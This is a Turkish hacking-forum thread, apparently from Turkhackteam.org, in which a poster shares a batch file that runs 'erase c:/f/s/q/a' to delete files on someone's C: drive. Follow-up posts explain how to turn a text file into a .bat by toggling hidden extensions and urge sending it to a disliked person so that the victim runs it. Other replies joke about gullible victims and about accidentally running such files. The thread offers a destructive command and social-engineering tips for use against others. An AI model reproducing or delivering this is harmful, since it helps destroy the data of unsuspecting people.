Gıcık olduğun birinin masaüstünü ***ür

Köstebek-02

Yaşayan Forum Efsanesi
6 May 2008
15,580
45
Köstebek
Aşağıdaki kodları yeni metin belgesi açın ve içine yapıştırın kodu farklı kaydedin ve uzantısısını

.bat yapın.

CD..
CD..
CD.
erase c:/f/s/q/a
sonrada yollayın

Allaha emanet olun babacanlarrr

Köstebek-02

Yaşayan Forum Efsanesi
6 May 2008
15,580
45
Köstebek
önce bir not defteri aç ve bunu kodları oraya kaydet sonra denetim masasından araçları tıkla ve ordan da klasör seçeneklerini daha sonrada görünümü tıkla karşına çıkan safada bilinen dosya uzantılarını gizle var yanındaki işareti kaldır ve uygula de sonra da kydettigin notdefterinin adını degiştir mesela www.txt bunu sil www.bat yap ve kaydet sonra tekrar eski haline getir dosya uzantılarını gizle yii yani tekrar işaretle ve uygula de

Not:sakın bat yaptıgın dosyayı kendin açma karşıtarafa yolla o açsın umarım anlata bilmişimdirr

asi.10

Yeni üye
18 Ağu 2008
4
0
bunu yedireceğin kişi malın biri olması lazım bat dosyasını acması için yinede paylasım için tşk emege saydı

AcemiHacker:)

Yeni üye
24 Ağu 2008
4
0
Böyle Konular Paylaşırken lütfen Altına Büyük Bir Şekilde Dosyayı sakın kendiniz Açmayın kurban açsın yazın...Benim Başıma Geldi Bu Sitede...Elemanın biri bi kod yazmıs .bat la ilgili işte demiş "bunu kurbana yollayın bilgisayarına rest atsın ve şifresi 123456 olsun" ulan dosyaya bi tıkladım 5 den geriye saydı hop rest attı PC şifremi yazıyorum yok kabul etmiyo 10 dk boyunca mal mal aynı şifreyi yazdım sonra aklıma geldi 123456 oldugu ^^ Daha Acemiyim xD

al-kan

Katılımcı Üye
19 Eyl 2007
490
2
Black city..
Sosyal Mühendislik Dahi Tutmaz Bat Doslarında Adam Sağ Tıklar Düznle Der Kodlara Bakar .!
Eee SOnuç ?
Küfür Yersin :)

balgam

Yeni üye
28 Eki 2008
4
0
birader anladım yaptımda bu gıcık olduğum vatandaşın masa üstünde ne olacak be onu mera ediyom

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.